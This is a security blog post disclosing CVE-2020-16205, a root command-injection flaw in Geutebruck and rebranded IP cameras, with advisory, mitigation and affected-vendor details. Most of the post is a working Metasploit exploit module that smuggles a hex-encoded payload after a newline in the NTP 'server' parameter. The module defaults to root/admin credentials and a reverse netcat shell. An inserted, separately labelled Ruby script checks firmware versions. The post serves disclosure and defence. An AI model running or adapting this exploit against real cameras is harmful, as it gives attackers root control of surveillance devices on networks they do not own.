[s05e01] RCE on Geutebruck IP Cameras

By Davy Douhine | August 7, 2020

Abstract

Those who follow our blog know that we like Geutebruck cameras: we have found many trivial RCEs in their products since 2016.

A few months ago we found a new one. These new attack vectors / vulnerabilities affect firmware versions 1.12.0.25 and prior, as well as the limited versions 1.12.13.2 and 1.12.14.5, of the following Encoder and E2 Series camera models:

G-Code:

  • EEC-2xxx

G-Cam:

  • EBC-21xx
  • EFD-22xx
  • ETHC-22xx
  • EWPC-22xx

As before, we chose to responsibly disclose this 0day vulnerability directly to Geutebruck and to ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware (1.12.0.27) has been released to fix it, ICS-CERT has published an advisory and one CVE (CVE-2020-16205) has been assigned.

Many thanks to Geutebruck and ICS-CERT teams.


Advisory

https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03


Exploit

This time we wrote a quick and dirty Metasploit module with a check feature, so you can test whether your camera is vulnerable.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
        authenticated user to execute arbitrary commands with root privileges.
        Firmware <= 1.12.14.5 are concerned.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
      },
      'Author'         =>
        [
          'Davy Douhine'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2020-16205' ],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
        ],
      'DisclosureDate' => 'May 20 2020',
      'Privileged'     => true,
      'Platform'       => ['unix', 'linux'],
      'Arch'           => [ARCH_ARMLE],
      'Targets'        => [
        [ 'Automatic Target', { } ]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        }
      ))

    register_options(
      [
        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
        OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
      ])
  end

  # Fingerprint only: /brand.xml is fetched and its body is matched against
  # the one firmware string this module was tested on. Any other affected
  # version therefore comes back as Safe (a false negative).
  def check
    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => '/brand.xml',
        'query'  => ''
      )
      if res && res.body.include?('1.12.14.5')
        return CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      return CheckCode::Unknown
    end
    CheckCode::Safe
  end

  # The encoded payload is appended after an encoded newline (%0a) in the
  # "server" parameter of the NTP test action. HttpUsername/HttpPassword are
  # read here but the raw GET request below does not send them.
  def exploit
    user = datastore['HttpUsername']
    pass = datastore['HttpPassword']
    header = "type=ntp&server=%0a"
    uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    res = send_request_raw(
      {
        'method' => 'GET',
        'uri'    => uri
      })
  end

end
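The module's check only matches the single firmware string it was tested on, so a camera on 1.12.0.25 or 1.12.13.2 is reported as safe. The following is an added example (not part of the original post or the Metasploit module) that classifies a version against the whole affected set given in the advisory paragraph above; the layout of /brand.xml is not documented here, so the version is pulled out with a generic dotted-quad regex and the sample bodies are constructed.

```ruby
# Added example, not part of the original post or its Metasploit module.
# Classifies a camera firmware version against the affected set described
# in the post. The layout of /brand.xml is not documented on this page, so
# the version is extracted with a generic dotted-quad regex (an assumption).

AFFECTED_UP_TO   = [1, 12, 0, 25]                    # "1.12.0.25 and prior"
AFFECTED_LIMITED = [[1, 12, 13, 2], [1, 12, 14, 5]]  # the limited versions
FIXED_FROM       = [1, 12, 0, 27]                    # vendor fix release

# Extract the first a.b.c.d version from a response body; nil if none.
def parse_version(body)
  m = body.match(/(\d+)\.(\d+)\.(\d+)\.(\d+)/)
  m && m.captures.map(&:to_i)
end

# Returns :vulnerable, :patched or :unknown.
# A plain numeric compare is not enough: 1.12.13.2 sorts above the fixed
# 1.12.0.27 yet is affected, so the limited list is consulted first, and
# only the 1.12.0.x line at or after .27 is reported as patched. Anything
# else above 1.12.0.25 is reported as :unknown rather than guessed.
def firmware_status(body)
  v = parse_version(body)
  return :unknown if v.nil?
  return :vulnerable if AFFECTED_LIMITED.include?(v)
  return :vulnerable if (v <=> AFFECTED_UP_TO) <= 0
  return :patched if v[0, 3] == FIXED_FROM[0, 3] && v[3] >= FIXED_FROM[3]
  :unknown
end

# Constructed sample bodies (the real /brand.xml tag names may differ).
SAMPLES = {
  'tested camera' => '<brand><firmware>1.12.14.5</firmware></brand>',
  'older release' => '<brand><firmware>1.11.9.3</firmware></brand>',
  'fixed release' => '<brand><firmware>1.12.0.27</firmware></brand>',
  'no version'    => '<brand><model>EFD-2250</model></brand>',
}

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each { |name, body| puts "#{name}: #{firmware_status(body)}" }
end
```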


Mitigation

Geutebruck has released a new software version, Version 1.12.0.27, to address the identified vulnerability, which is available at the following location (registration needed):

http://www.geutebrueck.com/en_EN/login.html

If an update is not possible right now, users can in the meantime disable the “Enable anonymous access” option to mitigate the risk. The RCE will remain but will only be reachable by authenticated users.


In the wild

Many brands use the same firmware (and are vulnerable too):

  • UDP Technology (which is also the supplier of the firmware for the other vendors)
  • Ganz
  • Visualint
  • Cap
  • THRIVE Intelligence
  • Sophus
  • VCA
  • TripCorps
  • Sprinx Technologies
  • Smartec
  • Riva